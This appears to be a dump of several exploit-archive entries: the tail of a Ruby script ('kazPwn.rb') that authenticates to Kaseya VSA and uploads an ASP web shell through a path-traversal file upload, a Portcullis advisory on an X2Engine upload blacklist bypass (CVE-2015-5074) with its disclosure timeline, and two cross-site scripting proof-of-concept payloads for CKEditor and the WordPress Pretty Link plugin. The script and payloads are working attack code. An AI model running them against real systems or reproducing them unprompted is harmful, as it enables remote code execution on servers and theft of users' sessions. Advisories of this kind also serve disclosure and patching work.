puts "**** WARN: Mechanize retried connection reset #{MAX_RESET_RETRIES} times and never succeeded: #{action}"
raise
end
# Otherwise, shutdown the persistent HTTP connection and try again.
# puts "**** WARN: Mechanize retrying connection reset error: #{action}"
retry_count += 1
self.http.shutdown
retry
end
end
# Alias so #fetch actually uses our new #fetch_with_retry to wrap the
# old one aliased as #fetch_without_retry.
alias_method :fetch_without_retry, :fetch
alias_method :fetch, :fetch_with_retry
end
if ARGV.length < 4
puts 'Usage: ./kazPwn.rb http[s]://<host>[:port] <username> <password> <shell.asp>'
exit -1
end
host = ARGV[0]
username = ARGV[1]
password = ARGV[2]
shell_file = ARGV[3]
login_url = host + '/vsapres/web20/core/login.aspx'
agent = Mechanize.new
# 1- go to the login URL, get a session cookie and the challenge.
page = agent.get(login_url)
login_form = page.forms.first
challenge = login_form['loginFormControl$ChallengeValueField']
# 2- calculate the password hashes with the challenge
source = open(host + "/inc/sha256.js").read
source += open(host + "/inc/coverPass.js").read
source += open(host + "/inc/coverPass256.js").read
source += open(host + "/inc/coverData.js").read
source += open(host + "/inc/passwordHashes.js").read
source.gsub!(/\<\!--(\s)*\#include.*--\>/, "") # remove any includes, this causes execjs to fail
context = ExecJS.compile(source)
hashes = context.call("getHashes",username,password,challenge)
# 3- submit the login form, authenticate our cookie and get the ReferringWebWindowId needed to upload the file
# We need the following input values to login:
# - __EVENTTARGET (empty)
# - __EVENTARGUMENT (empty)
# - __VIEWSTATE (copied from the original GET request)
# - __VIEWSTATEENCRYPTED (copied from the original GET request; typically empty)
# - __EVENTVALIDATION (copied from the original GET request)
# - loginFormControl$UsernameTextbox (username)
# - loginFormControl$PasswordTextbox (empty)
# - loginFormControl$SubmitButton (copied from the original GET request; typically "Logon")
# - loginFormControl$SHA1Field (output from getHashes)
# - loginFormControl$RawSHA1Field (output from getHashes)
# - loginFormControl$SHA256Field (output from getHashes)
# - loginFormControl$RawSHA256Field (output from getHashes)
# - loginFormControl$ChallengeValueField (copied from the original GET request)
# - loginFormControl$TimezoneOffset ("0")
# - loginFormControl$ScreenHeight (any value between 800 - 2048)
# - loginFormControl$ScreenWidth (any value between 800 - 2048)
login_form['__EVENTTARGET'] = ''
login_form['__EVENTARGUMENT'] = ''
login_form['loginFormControl$UsernameTextbox'] = username
login_form['loginFormControl$SHA1Field'] = hashes['SHA1Hash']
login_form['loginFormControl$RawSHA1Field'] = hashes['RawSHA1Hash']
login_form['loginFormControl$SHA256Field'] = hashes['SHA256Hash']
login_form['loginFormControl$RawSHA256Field'] = hashes['RawSHA256Hash']
login_form['loginFormControl$TimezoneOffset'] = 0
login_form['loginFormControl$SubmitButton'] = 'Logon'
login_form['loginFormControl$screenHeight'] = rand(800..2048)
login_form['loginFormControl$screenWidth'] = rand(800..2048)
page = agent.submit(login_form)
web_windowId = Hash[URI::decode_www_form(page.uri.query)]['ReferringWebWindowId']
# 4- upload the file using the ReferringWebWindowId
page = agent.post('/vsapres/web20/json.ashx',
'directory' => "../WebPages",
'ReferringWebWindowId' => web_windowId,
'request' => 'uploadFile',
'impinf__uploadfilelocation' => File.open(shell_file)
)
if page.code == "200"
puts "Shell uploaded, check " + host + "/" + File.basename(shell_file)
else
puts "Error occurred, shell was not uploaded correctly..."
end
Source: https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2015-5074/
Details:
It was discovered that authenticated users were able to upload files of any type providing that the file did not have an extension that was listed in the following blacklist:
const EXT_BLACKLIST = '/\.\s*(?P<ext>html|htm|js|jsb|mhtml|mht|xhtml|xht|php|phtml|php3|php4|php5|phps|shtml|jhtml|pl|py|cgi|exe|scr|dll|msi|vbs|bat|com|pif|cmd|vxd|cpl|ini|conf|cnf|key|iv|htaccess)\b/i';
However, there is another common (not present in regexp) that allow PHP execution: .PHT. It is therefore possible to execute any PHP code on the remote system.
Impact:
Permitting the uploading of arbitrary files could result in highly damaging content such as malware, indecent images, viruses and/or pirated software being uploaded and stored, and later downloaded. In addition, the storage of such material could quite possibly have serious legal implications for the hosting organisation.
In this case, an attacker could exploit the functionality to upload server scripts which, when requested by a browser, would execute code on the server.
Exploit:
Exploit code not required.
Remediation:
The vendor has released a patch however it is also possible to add new extensions such as PHT to the existing blacklist.
Vendor status:
15/09/2014 Submitted initial contact via web form on X2Engine’s page
30/09/2014 Second initial contact message sent via web form
08/12/2014 Final chaser sent via their web form
20/01/2015 Automated response from the X2 website received on 08/12/2014. Attempting to contact the email address that it was sent from “john@x2engine.com”. If no response by the end of the week will start forced disclosure process
21/01/2015 Initial vendor response, details over vulnerability sent
26/02/2015 Chaser sent to vendor
17/04/2015 Second chaser sent to vendor
08/06/2015 Chaser sent to vendor. Unsure if his emails are getting through to us as he stated that he has been replying
08/06/2015 Vendor responded stating that they needed vulnerability details even though I had sent them months ago
09/06/2015 Vendor is approximately 75% through fix and will have a patch out within the next few weeks
26/06/2015 MITRE assigned CVE-2015-5074
13/07/2015 Vendor asked for CVEs to add to their page. Should be ready for publish soon when they have given their clients time to patch
22/07/2015 Email from vendor stating that they released the fix for this on 13/07/2015 and asked when we would be disclosing
23/07/2015 Vendor has asked if we wait off until they release their next major update (At some point in the next 2 weeks). Confirmed this is fine and to contact us when they have a release date confirmed for it
24/08/2015 Replied to the vendor
26/08/2015 Vendor confirmed that they are ready for us to publish
18/09/2015 Published
Copyright:
Copyright © Portcullis Computer Security Limited 2015, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.
Disclaimer:
The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user’s risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.
source: https://www.securityfocus.com/bid/58045/info
CKEditor is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
CKEditor 4.0.1 is vulnerable; other versions may also be affected.
<body onload="javascript:document.forms[0].submit()">
<form name="form1" method="post" action="http://www.example.com/admin/ckeditor/samples/sample_posteddata.php" enctype="multipart/form-data">
<input type="hidden" name="<script>alert('AkaStep');</script>" id="fupl" value="SENDF"></li>
</form>
source: https://www.securityfocus.com/bid/58072/info
The Pretty Link plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Versions prior to Pretty Link 1.6.3 are vulnerable.
http://www.example.com/wp-content/plugins/pretty-link/includes/version-2-kvasir/open-flash-chart.swf?get-data=(function(){alert(xss)})()